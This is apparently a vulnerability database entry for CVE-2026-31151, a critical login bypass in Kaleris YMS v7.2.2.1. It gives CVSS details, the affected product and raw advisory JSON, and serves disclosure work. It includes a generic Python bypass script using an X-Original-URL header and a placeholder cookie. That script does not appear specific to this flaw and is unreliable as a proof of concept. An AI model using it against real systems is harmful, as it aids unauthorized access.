Security Vulnerability Report
CVE-2026-31151 CVSS 9.8 CRITICAL

CVE-2026-31151

Published: 2026-04-06 15:17:10
Last Modified: 2026-04-10 18:02:47

Description

An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application's resources.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kaleris:yard_management_solutions:7.2.2.1:*:*:*:*:*:*:* - VULNERABLE
Kaleris YMS v7.2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Example)
target_url = "http://target-ip:port/admin"

# Vulnerability: Authentication Bypass
# Often involves manipulating headers or cookies to simulate an authenticated session
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "X-Original-URL": "/admin",  # Common bypass technique
    "Cookie": "auth_token=bypass_payload"  # Simulated payload
}

try:
    # Send request to protected resource without valid credentials
    response = requests.get(target_url, headers=headers, timeout=10)

    # Check if login was bypassed (Status 200 and specific content)
    if response.status_code == 200 and "Dashboard" in response.text:
        print("[+] Exploit Successful! Authentication bypassed.")
        print(f"[+] Content Length: {len(response.text)}")
    else:
        print("[-] Exploit Failed or Patched.")
        print(f"Status Code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

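References

https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151 (Exploit, Third Party Advisory)
https://kaleris.com/solutions/yard-management/ (Product)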

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31151", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:09.553", "lastModified": "2026-04-10T18:02:47.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application 's resources."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kaleris:yard_management_solutions:7.2.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "4981C1C6-A8B8-44C1-AB1C-132E7EE48677"}]}]}], "references": [{"url": "https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://kaleris.com/solutions/yard-management/", "source": "[email protected]", "tags": ["Product"]}]}}